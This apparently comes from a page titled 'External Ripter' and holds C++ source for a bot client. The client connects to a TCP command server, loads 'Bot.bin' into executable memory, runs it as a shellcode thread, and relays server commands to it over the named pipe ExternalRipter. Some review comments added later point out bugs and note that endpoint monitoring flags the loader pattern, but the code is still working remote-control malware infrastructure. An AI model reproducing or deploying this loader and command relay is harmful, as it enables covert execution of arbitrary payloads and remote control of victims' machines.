External Ripter

External Ripter


Connecting the bot to the server over TCP:

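Every message is framed as a 4-byte size followed by the message itself: to receive, read the 4 bytes (the message size) and then the message. Sending works the same way - we send the 4-byte size and then the message. The example shows loading a local payload. After the payload is loaded, it is run in a thread, and the client communicates with it via the named pipe `\\.\pipe\ExternalRipter` (written "\\\\.\\pipe\\ExternalRipter" as a C string literal).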


#include <iostream>
#include <process.h>
#include <stdio.h>
#include <string.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment (lib, "Ws2_32.lib")
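// TCP endpoint the example connects to (the loopback address in the listing as published).
#define PORT 8888
#define SERVERADDR "127.0.0.1"
// Upper bound for a message buffer, in bytes (1 MiB).
// Parenthesized so the macro expands to a single value inside larger expressions
// (unparenthesized, `x / BUFFER_MAX_SIZE` would expand to `x / 1024 * 1024`).
// NOTE(review): no code in this listing references this macro.
#define BUFFER_MAX_SIZE (1024 * 1024)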
/// Opens the named pipe `Name` for reading and writing, retrying until it succeeds.
///
/// Every attempt, including the first, is preceded by a one-second sleep. There is no
/// upper bound on the number of attempts, so the call blocks for as long as the pipe
/// cannot be opened.
///
/// @param Name  Pipe path passed unchanged to CreateFileA.
/// @return      A handle that is never INVALID_HANDLE_VALUE.
HANDLE connectPipe(const char* Name)
{
    for (;;) {
        Sleep(1000);
        HANDLE opened = CreateFileA(Name, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, NULL, NULL);
        if (opened != INVALID_HANDLE_VALUE) {
            return opened;
        }
    }
}
/// Writes one frame to the pipe: the 4-byte value of `len`, then `len` bytes of `data`.
///
/// @param p     Pipe handle to write to.
/// @param data  Payload bytes.
/// @param len   Payload size in bytes; also sent as the frame's length prefix.
/// @return      The result of the payload write only. The outcome of the length-prefix
///              write is not reported, and the byte counts are not compared with the
///              requested sizes.
BOOL sendPipe(HANDLE p, const char* data, DWORD len)
{
    DWORD written = 0;

    // Length prefix first; its BOOL result is intentionally left unused here because
    // the caller only ever sees the result of the second write.
    WriteFile(p, &len, 4, &written, NULL);

    const BOOL payloadOk = WriteFile(p, data, len, &written, NULL);
    return payloadOk;
}

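/// Reads one length-prefixed frame from the pipe: a 4-byte length, then that many bytes.
///
/// The length comes from the peer, so it is validated before it drives an allocation:
/// frames larger than 1 MiB (the same value as the file's BUFFER_MAX_SIZE) are rejected.
/// The returned buffer holds one extra byte set to '\0', because the caller in this file
/// builds a std::string from the pointer and therefore reads it as a C string.
///
/// @param pipe  Pipe handle to read from.
/// @param len   Out: payload size in bytes on success, 0 on failure.
/// @return      On success, a malloc'd buffer of `*len` payload bytes plus a terminating
///              '\0' (release with free()). On failure, a pointer to the string literal
///              "null", which must NOT be passed to free() or written to.
char* recvPipe(HANDLE pipe, DWORD* len) {
    char* const failed = const_cast<char*>("null");
    const DWORD maxFrameBytes = 1024 * 1024;

    if (len == NULL) {
        return failed;
    }
    *len = 0;

    // Read the whole 4-byte header. A failed read, or a read that makes no progress,
    // ends the attempt instead of leaving a partially filled length in use.
    DWORD frameLen = 0;
    DWORD got = 0;
    DWORD headerHave = 0;
    while (headerHave < sizeof(frameLen)) {
        char* dst = reinterpret_cast<char*>(&frameLen) + headerHave;
        if (!ReadFile(pipe, dst, static_cast<DWORD>(sizeof(frameLen)) - headerHave, &got, NULL) || got == 0) {
            return failed;
        }
        headerHave += got;
    }

    if (frameLen > maxFrameBytes) {
        return failed;  // refuse peer-declared sizes above the limit
    }

    char* buffer = static_cast<char*>(malloc(static_cast<size_t>(frameLen) + 1));
    if (buffer == NULL) {
        return failed;
    }

    // The original loop never terminated when ReadFile failed (zero bytes were added
    // on every pass) and leaked the buffer on the failure path.
    DWORD total = 0;
    while (total < frameLen) {
        if (!ReadFile(pipe, buffer + total, frameLen - total, &got, NULL) || got == 0) {
            free(buffer);
            return failed;
        }
        total += got;
    }

    buffer[frameLen] = '\0';
    *len = frameLen;
    return buffer;
}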

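/// Reads the 4-byte length prefix of the next frame from the socket.
///
/// recv() on a stream socket may return fewer bytes than requested, so the prefix is
/// read in a loop until all four bytes have arrived. The original issued a single
/// recv() and ignored its result, which could return a partially filled length.
///
/// @param my_socket  Connected stream socket.
/// @return           The length announced by the peer, or 0 if the connection was closed
///                   or recv() failed before the prefix was complete.
/// NOTE(review): the value is peer-controlled and is not range-checked here; callers
/// should bound it before using it as an allocation or read size.
DWORD recv_Server(SOCKET my_socket) {
    DWORD size = 0;
    char* dst = reinterpret_cast<char*>(&size);
    const int wanted = static_cast<int>(sizeof(size));

    int have = 0;
    while (have < wanted) {
        const int got = recv(my_socket, dst + have, wanted - have, 0);
        if (got <= 0) {
            return 0;  // closed (0) or SOCKET_ERROR (negative)
        }
        have += got;
    }
    return size;
}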
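/// Reads up to `size` bytes of frame payload from the socket into `buffer`.
///
/// The original stored recv()'s int result in a DWORD and added it to the running total
/// unconditionally: a SOCKET_ERROR (-1) wrapped the total backwards, so the next write
/// landed before the intended position, and a closed connection (0) looped forever.
/// Both cases now stop the loop.
///
/// @param my_socket  Connected stream socket.
/// @param buffer     Destination; the caller must provide at least `size` bytes.
/// @param size       Number of payload bytes expected.
/// @return           Number of bytes actually stored: `size` on success, less if the
///                   connection closed or failed first, 0 if `buffer` is null.
DWORD recv_Server2(SOCKET my_socket, char* buffer, DWORD size)
{
    if (buffer == NULL) {
        return 0;
    }

    const DWORD maxChunk = 0x7fffffff;  // recv() takes its length as an int
    DWORD total = 0;
    while (total < size) {
        const DWORD remaining = size - total;
        const int want = static_cast<int>(remaining < maxChunk ? remaining : maxChunk);
        const int got = recv(my_socket, buffer + total, want, 0);
        if (got <= 0) {
            break;  // closed (0) or SOCKET_ERROR (negative)
        }
        total += static_cast<DWORD>(got);
    }
    return total;
}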

/// Sends one frame on the socket: the 4 bytes of `length`, then `length` bytes of `buffer`.
///
/// @param my_socket  Connected stream socket.
/// @param buffer     Payload bytes.
/// @param length     Payload size in bytes; also sent as the frame's length prefix.
///
/// Neither send() result is examined, so failures and partial sends are not reported
/// to the caller.
void send_Server(SOCKET my_socket, char* buffer, int length) {
    const char* prefixBytes = reinterpret_cast<const char*>(&length);
    send(my_socket, prefixBytes, 4, 0);
    send(my_socket, buffer, length, 0);
}

// Despite its name, this function returns no bytes. It reads the file at `path` into
// newly allocated memory that is readable, writable and executable, starts a thread
// whose entry point is the first byte of that memory, and always returns 0 (a null
// char*). The only caller in this listing ignores the return value.
//
// NOTE(review, defensive): the file's contents are executed as code with no check of
// integrity, signature or origin, so whoever can write that file controls what runs in
// this process. A private PAGE_EXECUTE_READWRITE allocation filled from a file and then
// used as a thread start address is a sequence that endpoint monitoring commonly
// treats as suspicious.
//
// NOTE(review): none of the four API results is checked. If the open fails, hFile is
// INVALID_HANDLE_VALUE and the calls below still run with it. The file handle is
// never closed and the allocation is never released.
char* getBytes(std::string path)
{
// Open the existing file read-only; share mode 0 means no sharing while it is open.
HANDLE hFile = CreateFileA(path.c_str(), GENERIC_READ, 0, 0, OPEN_EXISTING, NULL, NULL);
// Only the low 32 bits of the size are requested (second argument is NULL).
DWORD fileSize = GetFileSize(hFile, NULL);
// Commit a region of fileSize bytes with read/write/execute protection.
void* base = VirtualAlloc(NULL, fileSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
DWORD dw;
// Copy the file into the region; dw (bytes read) is not compared with fileSize.
ReadFile(hFile, base, fileSize, &dw, NULL);
// Start a thread at the region's first byte; the returned thread handle is discarded.
_beginthread((_beginthread_proc_type)base, 0, NULL);
   return 0;
}


// Entry point: initializes Winsock, connects to SERVERADDR:PORT, loads "Bot.bin" via
// getBytes(), opens the named pipe, then relays length-prefixed frames in a loop:
// server -> pipe, pipe reply -> server. Every exit path returns -1.
//
// NOTE(review, defensive): the server address, the port, the file name "Bot.bin" and the
// pipe name \\.\pipe\ExternalRipter are fixed literals in this listing, so they are
// visible both in the built binary and at runtime (an outbound TCP connection, a named
// pipe opened by name).
int main()
{
// Scratch storage that WSAStartup fills through a WSADATA* cast.
// NOTE(review): a char array has no alignment guarantee for WSADATA; a WSADATA
// variable would be the conventional argument.
char buff[1024];
 if (WSAStartup(0x202, (WSADATA*)&buff[0]))
{
 printf("WSAStart error %d\n", WSAGetLastError());
  return -1;
}
   SOCKET my_sock;
my_sock = socket(AF_INET, SOCK_STREAM, 0);
// NOTE(review): SOCKET is an unsigned type in Winsock, so `my_sock < 0` can never be
// true; failure is reported as INVALID_SOCKET. As written, a failed socket() call is
// not detected here. WSACleanup() is also not called on this path.
 if (my_sock < 0)
{
       printf("Socket() error %d\n", WSAGetLastError());
       return -1;
}
sockaddr_in dest_addr;
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(PORT);
HOSTENT* hst;
// Treat SERVERADDR as a dotted-quad address first; otherwise resolve it as a host name.
 if (inet_addr(SERVERADDR) != INADDR_NONE)
 dest_addr.sin_addr.s_addr = inet_addr(SERVERADDR);
else
{
// Assignment inside the condition is intentional: a non-null result means resolved.
if (hst = gethostbyname(SERVERADDR))
// Copy the first resolved address into dest_addr.
((unsigned long*)&dest_addr.sin_addr)[0] =
((unsigned long**)hst->h_addr_list)[0][0];
else
{
printf("Invalid address %s\n", SERVERADDR);
closesocket(my_sock);
WSACleanup();
return -1;
}
}
// Retry connect() until it succeeds.
// NOTE(review): there is no delay and no attempt limit, so this loop spins for as
// long as the server is unreachable.
   bool con = true;
while (con)
{
if (connect(my_sock, (sockaddr*)&dest_addr, sizeof(dest_addr)) == 0)
con = false;
}
// Loads the file and starts it in a thread (see getBytes); the return value is ignored.
 getBytes("Bot.bin");
// Blocks until the pipe can be opened (see connectPipe).
HANDLE hPipe = connectPipe("\\\\.\\pipe\\ExternalRipter");
DWORD pLen = 0;
while (true)
{
// NOTE(review): `size` is supplied by the server and is used as an allocation and read
// size without any bound; the DWORD is also narrowed to int. The malloc result is not
// checked and `buffer` is never freed, so each iteration leaks one allocation.
int size = recv_Server(my_sock);// received the command length from the server
char* buffer = (char*)malloc(size);
 std::cout << "\n size byte: \n";
std::cout << size;
recv_Server2(my_sock, buffer, size);// received the command body from the server
std::cout << "\n get msg server:\n";
// NOTE(review): `buffer` is printed as a C string but nothing in this listing
// NUL-terminates it, so the stream may read past the `size` bytes that were received.
std::cout << buffer;
if(!sendPipe(hPipe, buffer, size))
break;// the command could not be sent to the pipe
std::cout << "\n send to pipe: \n";
std::cout << buffer;
// NOTE(review): the std::string is built from a char*, so it stops at the first NUL
// byte and may differ in length from pLen; the pointer returned by recvPipe is not
// kept, so it cannot be freed. The "null" sentinel is also indistinguishable from a
// genuine reply whose text is "null".
std::string data = recvPipe(hPipe, &pLen);// received the reply from the pipe
if (data == "null")
break;
 std::cout << "\n get from pipe: \n";
 std::cout << data;
std::cout << "\n send to server \n";
// Sends pLen bytes starting at data.c_str(); see the note above about pLen and data.size().
send_Server(my_sock, (char*)data.c_str(), pLen);// sent the reply to the server
}
// Reached on any exit from the loop, including pipe failures, although the message
// says "Recv error". hPipe is not closed before returning.
   printf("Recv error %d\n", WSAGetLastError());
 closesocket(my_sock);
   WSACleanup();
   return -1;
}


More information about Ripter 0.1
